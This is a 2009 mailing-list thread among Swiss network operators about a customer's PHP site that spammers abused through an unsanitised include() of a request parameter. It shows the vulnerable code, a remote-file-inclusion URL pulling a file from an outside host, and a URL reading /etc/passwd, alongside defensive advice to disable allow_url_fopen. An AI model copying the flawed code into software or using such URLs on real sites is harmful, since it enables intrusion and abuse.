Re: [swinog] F*ing Spammers and stupid customer code...

-- Mike Kellenberger mike.kellenberger@escapenet.ch Escapenet - the Web Company Tel +41 52 235 0700 http://www.escapenet.ch Skype mikek70atwork -----Ursprüngliche Nachricht----- Von: swinog-bounces@lists.swinog.ch [mailto:swinog-bounces@lists.swinog.ch] Im Auftrag von Gianni Carafa Gesendet: Donnerstag, 19. Februar 2009 17:04 An: swinog@swinog.ch Betreff: Re: [swinog] F*ing Spammers and stupid customer code... Thats bad coding anyway : http://www.thestupidcustomer.xy/index.php?called_page_link=/etc/passwd Regards Gianni Radek Mrskos schrieb: > I think, this is what you should have anyway in your php.ini > > > allow_url_fopen = Off > > /Radek > Am 19.02.2009 um 16:31 schrieb Mike Kellenberger: > > >> Hi all >> >> Just stopped our mail server from spitting out thousands of spam >> messages. >> >> We have a customer who has a site with the following (stupid) code in >> his index.php: >> >> if($called_page_link!="") >> { >> $requested_file=$called_page_link; >> } >> >> include($requested_file); >> >> >> The f*ing spammer found out about this and called the page with: >> >> http://www.thestupidcustomer.xy/index.php?called_page_link=http://geocit >> ies.com/nimiuu/fuck.txt? >> >> >> Boom. >> >> Have I already told you that I hate spammers? :-) >> >> Oh well, one down - a few million to go... >> >> >> Regards, >> >> Mike >> >> -- >> Mike Kellenberger mike.kellenberger@escapenet.ch >> Escapenet - the Web Company Tel +41 52 235 0700 >> http://www.escapenet.ch Skype mikek70atwork >> >> >> _______________________________________________ >> swinog mailing list >> swinog@lists.swinog.ch >> http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog >> > > Mit freundlichen Grüssen > > Radek Mrskos Email: mrskos@volume.ch > Baechlerstr. 12 Tel: +41 43 534 40 24 > CH-8802 Kilchberg Mob: +41 79 219 68 66 > PGP:0x8CB69F6D Fax: +41 86079 2196 866 > > _______________________________________________ > swinog mailing list > swinog@lists.swinog.ch > http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog > _______________________________________________ swinog mailing list swinog@lists.swinog.ch http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog